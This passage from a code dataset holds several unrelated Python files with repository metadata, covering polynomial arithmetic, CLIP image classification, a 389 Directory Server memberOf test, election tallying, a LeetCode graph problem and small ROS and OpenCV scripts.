d.std()))\n\n rolling_metrics = make_rolling_metrics(metrics, rolling=50)\n fig, axs = make_plots(rolling_metrics)\n plt.show()\n","repo_name":"striest/maxent_irl_maps","sub_path":"scripts/data_analysis/analyze_experiments.py","file_name":"analyze_experiments.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13655586616","text":"# N=10^5, 이중 for문 : O(N^2)=10^10(시간 초과)\r\n# 단일 for문 : O(N) -> data에서 한 칸씩 옮기고, if 불만족시 비교 값 변경\r\n# 내림차순일 경우 또한 고려해야 함.\r\n\r\nn = int(input())\r\ndata = list(map(int, input().split()))\r\nx = data[0]\r\ncnt = 0\r\nresult = []\r\n\r\nfor i in range(1,n):\r\n if data[i]max:\n\t\t\t\tmax=prob\n\t\t\t\tresult=[i,j]\n\t\t#print\n\treturn result\n\n#print \"result:\",\n#print result\n\n#print 1/max[0]\n\n","repo_name":"cathcart/Cool-code-scraps","sub_path":"betting/poss.py","file_name":"poss.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12022057212","text":"#! encoding: utf-8\nimport yaml\n\nconditions = [u'判断输入信号', u'判断输出信号', u'判断位置']\noperations = {u'判断输入信号': [u'有信号', u'无信号'], u'判断输出信号': [u'有信号', u'无信号'], u'判断位置': [u'已到达', u'未到达'] }\nvalues = {u'判断输入信号': [unicode('getInput(%d)' % in_io) for in_io in range(64)],\n u'判断输出信号': [unicode('getOutput(%d)' % out_io) for out_io in range(32)],\n u'判断位置': [unicode('getTargetOk(P%d)' % pos) for pos in range(100)]}\noperation_values = {u'有信号': u'==0', u'无信号': u'!=0', u'已到达': u'==0', u'未到达': u'!=0'}\ndefault_append_item = (u'判断输入信号', [], {'condition_value': u'getInput(0)', 'operation_value': u'有信号'})\ndefault_refresh_data = {'condition': ([], 'list'), 'check_allconditions': True}\ncondition_data = {}\ncondition_data['condition'] = conditions\ncondition_data['operation'] = operations\ncondition_data['operation_values'] = operation_values\ncondition_data['value'] = values\ncondition_data['default_append_item'] = default_append_item\ncondition_data['default_refresh_data'] = default_refresh_data\nwith open('../if_condition_data.yml', 'w') as f:\n f.write(yaml.dump(condition_data))\n f.close()\n\n","repo_name":"jinzhuwuyan/LuaProgrammingGUI","sub_path":"src/control/tools/create_if_condition_paneldata.py","file_name":"create_if_condition_paneldata.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12080158434","text":"class Polynomial:\n '''\n >>> p=Polynomial({0:8,1:2,3:4}) # keys are powers, values are coefficients\n >>> q=Polynomial({0:8,1:2,2:8,4:4})\n >>> repr(p)\n 8 + 2 x + 4 x^(3)\n >>> p*3 # integer multiply\n 24 + 6 x + 12 x^(3)\n >>> 3*p # multiplication is commutative!\n 24 + 6 x + 12 x^(3)\n >>> p+q # add two polynomials\n 16 + 4 x + 8 x^(2) + 4 x^(3) + 4 x^(4)\n >>> p*4 + 5 - 3*p - 1 # compose operations and add/subtract constants\n 12 + 2 x + 4 x^(3)\n >>> type(p-p) # zero requires special handling but is still a Polynomial\n Polynomial\n >>> p*q # polynomial by polynomial multiplication works as usual\n 64 + 32 x + 68 x^(2) + 48 x^(3) + 40 x^(4) + 40 x^(5) + 16 x^(7)\n >>> p.subs(10) # substitute in integers and evaluate\n 4028\n >>> (p-p) == 0\n True\n >>> p == q\n False\n >>> p=Polynomial({0:8,1:0,3:4}) # keys are powers, values are coefficients\n >>> repr(p)\n '8 + 4 x^(3)'\n >>> p = Polynomial({2:1,0:-1})\n >>> q = Polynomial({1:1,0:-1})\n >>> p/q\n 1 + x\n >>> p / Polynomial({1:1,0:-3}) # raises NotImplementedError\n '''\n\n def __init__(self, param:dict):\n assert isinstance(param, dict)\n\n for k, v in param.items():\n assert isinstance(k, int)\n assert k >= 0\n assert isinstance(v, int)\n\n self.param = {}\n for k, v in param.items():\n if param[k] != 0:\n self.param[k] = v\n\n self.sortedKeys = sorted(self.param)\n\n def __repr__(self):\n res = \"\"\n if len(self.param) == 0:\n return \"0\"\n\n paramLen = len(self.param)\n sortedKeys = self.sortedKeys\n\n for i, k in enumerate(sortedKeys):\n v = self.param[k]\n if v == 0:\n continue\n if k == 0:\n if v < 0:\n res = res + \"- \" + str(abs(v))\n else:\n res = res + str(v)\n else:\n term = \"\"\n if k == 1:\n if i == 0 and v < 0:\n if abs(v) == 1:\n term = '- x'\n else:\n term = f'- {abs(v)} x'\n else:\n if abs(v) == 1:\n term = 'x'\n else:\n term = f'{abs(v)} x'\n else:\n if i == 0 and v < 0:\n if abs(v) == 1:\n term = f'- x^({k})'\n else:\n term = f'- {abs(v)} x^({k})'\n else:\n if abs(v) == 1:\n term = f'x^({k})'\n else:\n term = f'{abs(v)} x^({k})'\n res = res + term\n\n if i != paramLen - 1:\n nextKey = sortedKeys[i + 1]\n nextVal = self.param[nextKey]\n if nextVal > 0:\n res = res + \" + \"\n if nextVal < 0:\n res = res + \" - \"\n return res\n\n def __mul__(self, other):\n resParam = {}\n\n if isinstance(other, int):\n if other == 0:\n return Polynomial(resParam)\n else:\n for k in self.param:\n resParam[k] = self.param[k] * other\n elif isinstance(other, Polynomial):\n selfSortedKeys = self.sortedKeys\n otherSortedKeys = other.sortedKeys\n\n m = len(selfSortedKeys)\n n = len(otherSortedKeys)\n\n for i in range(m):\n for j in range(n):\n selfKey = selfSortedKeys[i]\n otherKey = otherSortedKeys[j]\n selfVal = self.param[selfKey]\n otherVal = other.param[otherKey]\n\n resKey = selfKey + otherKey\n resVal = otherVal * selfVal\n\n if resKey in resParam:\n resVal = resVal + resParam[resKey]\n\n resParam[resKey] = resVal\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n return Polynomial(resParam)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __add__(self, other):\n resParam = {}\n\n if isinstance(other, int):\n if len(self.sortedKeys) == 0:\n resParam[0] = other\n else:\n for k, v in self.param.items():\n resParam[k] = v\n if self.sortedKeys[0] == 0:\n sumVal = self.param[0] + other\n if sumVal != 0:\n resParam[0] = sumVal\n else:\n del resParam[0]\n else:\n if other != 0:\n resParam[0] = other\n elif isinstance(other, Polynomial):\n selfSortedKeys = self.sortedKeys\n otherSortedKeys = other.sortedKeys\n\n i, j = 0, 0\n m = len(selfSortedKeys)\n n = len(otherSortedKeys)\n\n while i != m and j != n:\n selfKey = selfSortedKeys[i]\n otherKey = otherSortedKeys[j]\n selfVal = self.param[selfKey]\n otherVal = other.param[otherKey]\n\n if selfKey == otherKey:\n sumVal = selfVal + otherVal\n if sumVal != 0:\n resParam[selfKey] = sumVal\n i = i + 1\n j = j + 1\n elif selfKey < otherKey:\n resParam[selfKey] = selfVal\n i = i + 1\n else:\n resParam[otherKey] = otherVal\n j = j + 1\n\n if i == m and j != n:\n while j != n:\n otherKey = otherSortedKeys[j]\n otherVal = other.param[otherKey]\n resParam[otherKey] = otherVal\n j = j + 1\n\n if j == n and i != m:\n while i != m:\n selfKey = selfSortedKeys[i]\n selfVal = self.param[selfKey]\n resParam[selfKey] = selfVal\n i = i + 1\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n return Polynomial(resParam)\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __sub__(self, other):\n negOther = None\n if isinstance(other, int):\n negOther = - other\n elif isinstance(other, Polynomial):\n negParam = {}\n for k, v in other.param.items():\n negParam[k] = - v\n negOther = Polynomial(negParam)\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n return self.__add__(negOther)\n\n def __rsub__(self, other):\n return other.__sub__(self)\n\n def __neg__(self):\n resParam = {}\n\n for k, v in self.param.items():\n resParam[k] = - v\n\n return Polynomial(resParam)\n\n def subs(self, sub):\n assert isinstance(sub, int)\n\n res = 0\n for k, v in self.param.items():\n res = res + v * (sub ** k)\n\n return res\n\n def __eq__(self, other):\n if isinstance(other, int):\n return len(self.param) == 0 and other == 0\n elif isinstance(other, Polynomial):\n return self.param == other.param\n else:\n raise TypeError(f'Invalid op type: {type(other)}')\n\n def __truediv__(self, other):\n if isinstance(other, Polynomial):\n def degree(poly):\n while poly and poly[-1] == 0:\n poly.pop()\n return len(poly) - 1\n\n N = []\n D = []\n q = {}\n nLen = self.sortedKeys[-1] + 1\n dLen = other.sortedKeys[-1] + 1\n\n for k in range(nLen):\n if k not in self.param:\n N.append(0)\n else:\n N.append(self.param[k])\n\n for k in range(dLen):\n if k not in other.param:\n D.append(0)\n else:\n D.append(other.param[k])\n\n degreeN = self.sortedKeys[-1]\n degreeD = other.sortedKeys[-1]\n\n if degreeN >= degreeD:\n while degreeN >= degreeD:\n if N[-1] % D[-1] != 0:\n raise NotImplementedError\n mult = q[degreeN - degreeD] = N[-1] // D[-1]\n multD = [cf * mult for cf in D]\n for i in range(len(N) - 1, -1, -1):\n j = i - (len(N) - len(multD))\n if j >= 0:\n N[i] = N[i] - multD[j]\n degreeN = degree(N)\n r = N\n if len(r) != 0:\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n return Polynomial(q)\n elif isinstance(other, int):\n resParam = {}\n\n for k, v in self.param.items():\n if v % other == 0:\n resParam[k] = v // other\n else:\n raise NotImplementedError\n\n return Polynomial(resParam)\n else:\n raise NotImplementedError\n#\n#if __name__ == \"__main__\":\n# p = Polynomial({0:8, 1:2, 3:4})\n# q = Polynomial({0:8, 1:2, 2:8, 4:4})\n# print(p)\n# print(q)\n# print(\"hi\")\n# print(repr(p))\n# print(p * 3)\n# print(p * -3)\n# print(p * 0)\n# print(-3 * p)\n# print(p + q)\n# print(p + 3)\n# print(p + -8)\n# print(p + -9)\n# print(3 + p)\n# print(p - 3)\n# print(p - q)\n# print(q - p)\n# print(p - p)\n# print(p*4 + 5 - 3*p -1)\n# print(type(p - p))\n# print(p * q)\n# print(-p * q)\n# print(p.subs(10))\n# print((p - p) == 0)\n# print(p == q)\n# print(p == p)\n# print(1 == p)\n# n = Polynomial({2:1, 0:-1})\n# d = Polynomial({1:1, 0:-1})\n# print(n / 1)\n# print(n / d)\n# print(p / 2)\n","repo_name":"yyu233/Python_Practice","sub_path":"hw8/Polynomial.py","file_name":"Polynomial.py","file_ext":"py","file_size_in_byte":10249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15914570691","text":"import os\r\nimport csv\r\nimport clip\r\nimport torch\r\nimport pickle\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision.datasets import CIFAR100\r\nfrom tqdm import tqdm\r\nfrom config import *\r\nfrom dataset import CustomDataset\r\nfrom sklearn.metrics import classification_report\r\n\r\n# Load the model\r\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\nmodel, preprocess = clip.load('ViT-B/32', device)\r\n\r\n# Load the dataset\r\ntrain = CustomDataset(images_path, [train_labels_path, val_labels_path], transform=preprocess)\r\ntest = CustomDataset(images_path, test_labels_path, transform=preprocess)\r\n\r\ndef get_features(dataset):\r\n all_features = []\r\n all_labels = []\r\n \r\n with torch.no_grad():\r\n for images, labels in tqdm(DataLoader(dataset, batch_size=100)):\r\n features = model.encode_image(images.to(device))\r\n\r\n all_features.append(features)\r\n all_labels.append(labels)\r\n\r\n return torch.cat(all_features).cpu().numpy(), torch.cat(all_labels).cpu().numpy()\r\n\r\nif not os.path.isfile(features_labels_file):\r\n # Calculate the image features\r\n train_features, train_labels = get_features(train)\r\n test_features, test_labels = get_features(test)\r\n\r\n # Save image features\r\n features_labels = {\"train_features\": train_features, \r\n \"train_labels\": train_labels, \r\n \"test_features\": test_features, \r\n \"test_labels\": test_labels}\r\n with open(features_labels_file, \"wb\") as f:\r\n pickle.dump(features_labels, f)\r\nelse:\r\n # Load image features\r\n with open(features_labels_file, \"rb\") as f:\r\n features_labels = pickle.load(f)\r\n train_features = features_labels[\"train_features\"]\r\n train_labels = features_labels[\"train_labels\"]\r\n test_features = features_labels[\"test_features\"]\r\n test_labels = features_labels[\"test_labels\"]\r\n\r\nif classifier_model == \"logistic regression\" and not os.path.isfile(model_paths[classifier_model]):\r\n # Perform logistic regression\r\n classifier = LogisticRegression(random_state=0, C=0.316, max_iter=1000, verbose=1)\r\n classifier.fit(train_features, train_labels)\r\n with open(model_paths[classifier_model], \"wb\") as f:\r\n pickle.dump(classifier, f)\r\nelif classifier_model == \"mlp\" and not os.path.isfile(model_paths[classifier_model]):\r\n # Perform MLP\r\n input_feature_size = train_features.shape[1]\r\n classifier = MLPClassifier(random_state=0, max_iter=1000, hidden_layer_sizes=(int(input_feature_size/2),), verbose=1)\r\n classifier.fit(train_features, train_labels)\r\n with open(model_paths[classifier_model], \"wb\") as f:\r\n pickle.dump(classifier, f)\r\nelse:\r\n model_path = model_paths[classifier_model]\r\n print(\"Loading pretrained model from %s\" % (model_path))\r\n with open(model_path, 'rb') as f:\r\n classifier = pickle.load(f)\r\n\r\n# # Evaluate using the logistic regression classifier\r\npredictions = classifier.predict(test_features)\r\nprint(classification_report(test_labels, predictions, target_names=classes))\r\naccuracy = np.mean((test_labels == predictions).astype(np.float)) * 100.\r\nprint(f\"Test Accuracy = {accuracy:.3f}\")","repo_name":"robertocarlosjuan/Text-Region-Grouping","sub_path":"img_classifier/CLIP/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13404510171","text":"import pytest\nfrom lib389.tasks import *\nfrom lib389.utils import *\nfrom lib389.topologies import topology_st\n\nfrom lib389._constants import SUFFIX, DEFAULT_SUFFIX, PLUGIN_MEMBER_OF, DN_PLUGIN\n\nSCOPE_IN_CN = 'in'\nSCOPE_OUT_CN = 'out'\nSCOPE_IN_DN = 'cn=%s,%s' % (SCOPE_IN_CN, SUFFIX)\nSCOPE_OUT_DN = 'cn=%s,%s' % (SCOPE_OUT_CN, SUFFIX)\n\nPROVISIONING_CN = \"provisioning\"\nPROVISIONING_DN = \"cn=%s,%s\" % (PROVISIONING_CN, SCOPE_IN_DN)\n\n# Skip on older versions\npytestmark = [pytest.mark.tier2,\n pytest.mark.skipif(ds_is_older('1.3.3'), reason=\"Not implemented\")]\n\nACTIVE_CN = \"accounts\"\nSTAGE_CN = \"staged users\"\nDELETE_CN = \"deleted users\"\nACTIVE_DN = \"cn=%s,%s\" % (ACTIVE_CN, SCOPE_IN_DN)\nSTAGE_DN = \"cn=%s,%s\" % (STAGE_CN, PROVISIONING_DN)\nDELETE_DN = \"cn=%s,%s\" % (DELETE_CN, PROVISIONING_DN)\n\nSTAGE_USER_CN = \"stage guy\"\nSTAGE_USER_DN = \"cn=%s,%s\" % (STAGE_USER_CN, STAGE_DN)\n\nACTIVE_USER_CN = \"active guy\"\nACTIVE_USER_DN = \"cn=%s,%s\" % (ACTIVE_USER_CN, ACTIVE_DN)\n\nOUT_USER_CN = \"out guy\"\nOUT_USER_DN = \"cn=%s,%s\" % (OUT_USER_CN, SCOPE_OUT_DN)\n\nSTAGE_GROUP_CN = \"stage group\"\nSTAGE_GROUP_DN = \"cn=%s,%s\" % (STAGE_GROUP_CN, STAGE_DN)\n\nACTIVE_GROUP_CN = \"active group\"\nACTIVE_GROUP_DN = \"cn=%s,%s\" % (ACTIVE_GROUP_CN, ACTIVE_DN)\n\nOUT_GROUP_CN = \"out group\"\nOUT_GROUP_DN = \"cn=%s,%s\" % (OUT_GROUP_CN, SCOPE_OUT_DN)\n\nlogging.getLogger(__name__).setLevel(logging.DEBUG)\nlog = logging.getLogger(__name__)\n\n\ndef _header(topology_st, label):\n topology_st.standalone.log.info(\"\\n\\n###############################################\")\n topology_st.standalone.log.info(\"#######\")\n topology_st.standalone.log.info(\"####### %s\" % label)\n topology_st.standalone.log.info(\"#######\")\n topology_st.standalone.log.info(\"###############################################\")\n\n\ndef _add_user(topology_st, type='active'):\n if type == 'active':\n topology_st.standalone.add_s(Entry((ACTIVE_USER_DN, {\n 'objectclass': \"top person inetuser\".split(),\n 'sn': ACTIVE_USER_CN,\n 'cn': ACTIVE_USER_CN})))\n elif type == 'stage':\n topology_st.standalone.add_s(Entry((STAGE_USER_DN, {\n 'objectclass': \"top person inetuser\".split(),\n 'sn': STAGE_USER_CN,\n 'cn': STAGE_USER_CN})))\n else:\n topology_st.standalone.add_s(Entry((OUT_USER_DN, {\n 'objectclass': \"top person inetuser\".split(),\n 'sn': OUT_USER_CN,\n 'cn': OUT_USER_CN})))\n\n\ndef _find_memberof(topology_st, user_dn=None, group_dn=None, find_result=True):\n assert (topology_st)\n assert (user_dn)\n assert (group_dn)\n ent = topology_st.standalone.getEntry(user_dn, ldap.SCOPE_BASE, \"(objectclass=*)\", ['memberof'])\n found = False\n if ent.hasAttr('memberof'):\n\n for val in ent.getValues('memberof'):\n topology_st.standalone.log.info(\"!!!!!!! %s: memberof->%s\" % (user_dn, val))\n if val == group_dn:\n found = True\n break\n\n if find_result:\n assert (found)\n else:\n assert (not found)\n\n\ndef _find_member(topology_st, user_dn=None, group_dn=None, find_result=True):\n assert (topology_st)\n assert (user_dn)\n assert (group_dn)\n ent = topology_st.standalone.getEntry(group_dn, ldap.SCOPE_BASE, \"(objectclass=*)\", ['member'])\n found = False\n if ent.hasAttr('member'):\n\n for val in ent.getValues('member'):\n topology_st.standalone.log.info(\"!!!!!!! %s: member ->%s\" % (group_dn, val))\n if ensure_str(val) == user_dn:\n found = True\n break\n\n if find_result:\n assert (found)\n else:\n assert (not found)\n\n\ndef _modrdn_entry(topology_st=None, entry_dn=None, new_rdn=None, del_old=0, new_superior=None):\n assert topology_st != None\n assert entry_dn != None\n assert new_rdn != None\n\n topology_st.standalone.log.info(\"\\n\\n######################### MODRDN %s ######################\\n\" % new_rdn)\n if new_superior:\n topology_st.standalone.rename_s(entry_dn, new_rdn, newsuperior=new_superior, delold=del_old)\n else:\n topology_st.standalone.rename_s(entry_dn, new_rdn, delold=del_old)\n\n\ndef _check_memberof(topology_st=None, action=None, user_dn=None, group_dn=None, find_result=None):\n assert (topology_st)\n assert (user_dn)\n assert (group_dn)\n if action == ldap.MOD_ADD:\n txt = 'add'\n elif action == ldap.MOD_DELETE:\n txt = 'delete'\n else:\n txt = 'replace'\n topology_st.standalone.log.info('\\n%s entry %s' % (txt, user_dn))\n topology_st.standalone.log.info('to group %s' % group_dn)\n\n topology_st.standalone.modify_s(group_dn, [(action, 'member', ensure_bytes(user_dn))])\n time.sleep(1)\n _find_memberof(topology_st, user_dn=user_dn, group_dn=group_dn, find_result=find_result)\n\n\ndef test_ticket47829_init(topology_st):\n topology_st.standalone.add_s(Entry((SCOPE_IN_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': SCOPE_IN_DN})))\n topology_st.standalone.add_s(Entry((SCOPE_OUT_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': SCOPE_OUT_DN})))\n topology_st.standalone.add_s(Entry((PROVISIONING_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': PROVISIONING_CN})))\n topology_st.standalone.add_s(Entry((ACTIVE_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': ACTIVE_CN})))\n topology_st.standalone.add_s(Entry((STAGE_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': STAGE_DN})))\n topology_st.standalone.add_s(Entry((DELETE_DN, {\n 'objectclass': \"top nscontainer\".split(),\n 'cn': DELETE_CN})))\n\n # add groups\n topology_st.standalone.add_s(Entry((ACTIVE_GROUP_DN, {\n 'objectclass': \"top groupOfNames\".split(),\n 'cn': ACTIVE_GROUP_CN})))\n topology_st.standalone.add_s(Entry((STAGE_GROUP_DN, {\n 'objectclass': \"top groupOfNames\".split(),\n 'cn': STAGE_GROUP_CN})))\n topology_st.standalone.add_s(Entry((OUT_GROUP_DN, {\n 'objectclass': \"top groupOfNames\".split(),\n 'cn': OUT_GROUP_CN})))\n\n # add users\n _add_user(topology_st, 'active')\n _add_user(topology_st, 'stage')\n _add_user(topology_st, 'out')\n\n # enable memberof of with scope account\n topology_st.standalone.plugins.enable(name=PLUGIN_MEMBER_OF)\n dn = \"cn=%s,%s\" % (PLUGIN_MEMBER_OF, DN_PLUGIN)\n topology_st.standalone.modify_s(dn, [(ldap.MOD_REPLACE, 'memberOfEntryScope', ensure_bytes(ACTIVE_DN))])\n\n topology_st.standalone.restart(timeout=10)\n\n\ndef test_ticket47829_mod_stage_user_modrdn_stage_user_1(topology_st):\n _header(topology_st, 'add an Stage user to a Active group. Then move Stage user to Stage')\n\n old_stage_user_dn = STAGE_USER_DN\n old_stage_user_rdn = \"cn=%s\" % STAGE_USER_CN\n new_stage_user_rdn = \"cn=x%s\" % STAGE_USER_CN\n new_stage_user_dn = \"%s,%s\" % (new_stage_user_rdn, STAGE_DN)\n\n # add Stage user to active group\n _check_memberof(topology_st, action=ldap.MOD_ADD, user_dn=old_stage_user_dn, group_dn=ACTIVE_GROUP_DN,\n find_result=False)\n _find_member(topology_st, user_dn=old_stage_user_dn, group_dn=ACTIVE_GROUP_DN, find_result=True)\n\n # move the Stage entry to Stage, expect no 'member' and 'memberof'\n _modrdn_entry(topology_st, entry_dn=old_stage_user_dn, new_rdn=new_stage_user_rdn, new_superior=STAGE_DN)\n _find_memberof(topology_st, user_dn=new_stage_user_dn, group_dn=ACTIVE_GROUP_DN, find_result=False)\n _find_member(topology_st, user_dn=new_stage_user_dn, group_dn=ACTIVE_GROUP_DN, find_result=False)\n\n\nif __name__ == '__main__':\n # Run isolated\n # -s for DEBUG mode\n CURRENT_FILE = os.path.realpath(__file__)\n pytest.main(\"-s %s\" % CURRENT_FILE)\n","repo_name":"389ds/389-ds-base","sub_path":"dirsrvtests/tests/tickets/ticket47833_test.py","file_name":"ticket47833_test.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"5692185929","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_swagger.views import get_swagger_view\n\nschema_view = get_swagger_view(title=\"API Documentation\")\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/docs/\", schema_view),\n path(\"companies/\", include(\"companies.urls\")),\n path(\"employees/\", include(\"employees.urls\")),\n path(\"devices/\", include(\"devices.urls\")),\n path(\n \"api/\", include(\"devices.api_urls\")\n ), # Include the API URLs from the 'devices' app\n]\n","repo_name":"Adnanrobi/Track_corpo_asset","sub_path":"corporate_assets_tracker/corporate_assets_tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39665653916","text":"\n#define the variables\ntotal_votes = 0\nrow_count = 0 \nhighest_votes = 0\nwinning_candidate = \"\"\nwinning_percentage = 0.00\n\n#lists/dictionaries\nvotes_by_candidate = {} #output ex: Charles Stockham: 23.049%\nkeys = [] #unique candidates\nvalues = 0 #variable containing sum of votes by candidate\nfound = False\n\n#imports\nimport csv\nimport os\nwith open(\"PyPoll/Resources/election_data.csv\") as election_data:\n reader = csv.reader(election_data)\n header = next(reader)\n\n\n for row in reader:\n unique_candidates = row[2] #next(reader)\n total_votes = total_votes + 1\n if unique_candidates not in keys:\n keys.append(unique_candidates) \n votes_by_candidate[unique_candidates] = 0 #tracker begins\n votes_by_candidate[unique_candidates] = votes_by_candidate[unique_candidates] + 1 #take candidates in the dict and add each time\n print(f\"Election Results\")\n print(f\"-------------------------\") \n print(f\"Total Votes: {total_votes}\")\n print(f\"-------------------------\") \n\nanalysis_file_path = os.path.join('PyPoll','analysis','analysis.txt')\n\nwith open(analysis_file_path, 'w') as file:\n writer =csv.writer(file)\n writer.writerow({f\"Election Results\"})\n writer.writerow({f\"-------------------------\"}) \n writer.writerow({f\"Total Votes: {total_votes}\"}) \n writer.writerow({f\"-------------------------\"}) \n\n for candidate, vote_count in votes_by_candidate.items(): #vote = vote count\n vote_winner = votes_by_candidate.get(candidate) #trying to get vote in dict - - #dict.get(unique_candidates)\n vote_percentage =float(vote_winner)/float(total_votes)\n if vote_winner > highest_votes: \n highest_votes = vote_winner\n winning_candidate = candidate\n winning_percentage = vote_percentage\n print(f\"{candidate}: {vote_percentage:.3%} ({vote_winner})\")\n \n writer.writerow({f\"{candidate}: {vote_percentage:.3%} ({vote_winner})\"})\n writer.writerow({f\"-------------------------\"}) \n writer.writerow({f\"Winner: {winning_candidate}\"})\n writer.writerow({f\"-------------------------\"}) \n\nprint(f\"-------------------------\") \nprint(f\"Winner: {winning_candidate}\")\nprint(f\"-------------------------\") \n\n\n","repo_name":"ericlsimon/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41694067156","text":"# -*- coding: utf-8 -*-\n\"\"\"\n CreatedDate: 2022-07-19\n FileName : calcEquation.py\n Author : Honghe\n Descreption: 399. 除法求值 https://leetcode.cn/problems/evaluate-division/\n\"\"\"\nfrom typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n \"\"\"\n dfs,构建出图来就行,注意是有向图。\n :param equations:\n :param values:\n :param queries:\n :return:\n \"\"\"\n num_values = {}\n graph = defaultdict(list)\n\n for index,equation in enumerate(equations):\n x,y = equation\n graph[x].append(y)\n graph[y].append(x)\n num_values[(x,y)]=values[index]\n num_values[(y,x)] = round(1/values[index],5)\n\n res = []\n for query in queries:\n x,y = query\n if x not in graph or y not in graph:\n res.append(-1.0)\n continue\n if x==y:\n res.append(1.0)\n continue\n path = [x]\n visited = set([x])\n tmp = self.dfs(graph,path,y,x,visited)\n if not tmp:\n res.append(-1.0)\n else:\n value = 1.0\n print((x,y))\n for i in range(len(path)-1):\n value*=num_values.get((path[i],path[i+1]))\n res.append(value)\n return res\n\n def dfs(self,graph,path,target,node,visited):\n for i in graph.get(node):\n if i in visited:\n continue\n visited.add(i)\n path.append(i)\n if i==target:\n return True\n res = self.dfs(graph,path,target,i,visited)\n if res:\n return True\n path.pop()\n return False\n\n def calcEquation2(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n \"\"\"\n 带权查并集,注意合并时的权重更新。\n :param equations:\n :param values:\n :param queries:\n :return:\n \"\"\"\n node_ids = {}\n count = 0\n parents = list(range(len(equations)*2))\n size_list = [1.0] * len(equations)*2\n for index,equation in enumerate(equations):\n x, y = equation\n if x not in node_ids:\n node_ids[x] = count\n count+=1\n if y not in node_ids:\n node_ids[y] = count\n count += 1\n self.union(node_ids[x],node_ids[y],parents,size_list,values[index])\n\n res = []\n for query in queries:\n x, y = query\n if x not in node_ids or y not in node_ids:\n res.append(-1.0)\n continue\n if x==y:\n res.append(1.0)\n continue\n father_x = self.find(node_ids[x],parents,size_list)\n father_y = self.find(node_ids[y], parents, size_list)\n if father_x!=father_y:\n res.append(-1.0)\n else:\n res.append(size_list[node_ids[x]]/size_list[node_ids[y]])\n return res\n\n def find(self, node, parents, size_list):\n father = parents[node]\n if father!=node:\n parents[node] = self.find(father,parents,size_list)\n size_list[node] *= size_list[father] # 注意权重/距离更新\n return parents[node]\n\n def union(self,node_a,node_b, parents, size_list,weight):\n father_a = self.find(node_a, parents, size_list)\n father_b = self.find(node_b, parents, size_list)\n if father_a==father_b:\n return\n parents[father_a] = father_b\n size_list[father_a] = size_list[node_b]*weight/size_list[node_a] # 注意权重/距离更新\n\nif __name__ == '__main__':\n equations = [[\"a\", \"b\"], [\"e\", \"f\"], [\"b\", \"e\"]]\n values = [3.4, 1.4, 2.3]\n queries = [[\"a\", \"f\"]]\n sol = Solution()\n print(sol.calcEquation2(equations,values,queries))\n\n\n\n\n","repo_name":"whan2013xh/leetcode300","sub_path":"src/offer_2/day38-图/calcEquation.py","file_name":"calcEquation.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24388899208","text":"import numpy as np\nimport cv2\n\nimg = np.full(shape=(300, 400, 3), fill_value=[0,128,128], dtype=np.uint8)\n\n# Beispiel Zebrastreifen\nfor x in range(0, img.shape[1], 20): # von 0 bis Breite des bildes in 20er Schritten\n img[:, x: x+10] = [0,0,0]\n\ncv2.imshow(\"Beispiele\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Brandsatz/Audio-Video-Programmierung","sub_path":"Hausaufgaben/Video_1/openCV/opencv_getting_started.py","file_name":"opencv_getting_started.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26121377480","text":"import rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import Int8, Int16\nfrom sensor_msgs.msg import Imu\n\nfrom tf_transformations import euler_from_quaternion\nfrom math import pi\n\nclass SquareTest(Node):\n\n def __init__(self):\n # ROS stuff\n super().__init__('square_test')\n\n self.yaw_pub = self.create_publisher(Int16, '/target/yaw', 10)\n self.surge_pub = self.create_publisher(Int8, '/thrusters/surge', 10)\n\n self.yaw_thrust_sub = self.create_subscription(Int8, '/thrusters/yaw', self.yaw_cb, 10)\n\n self.declare_parameter('surge_time', 5.0)\n self.surge_time = self.get_parameter('surge_time').get_parameter_value().double_value\n 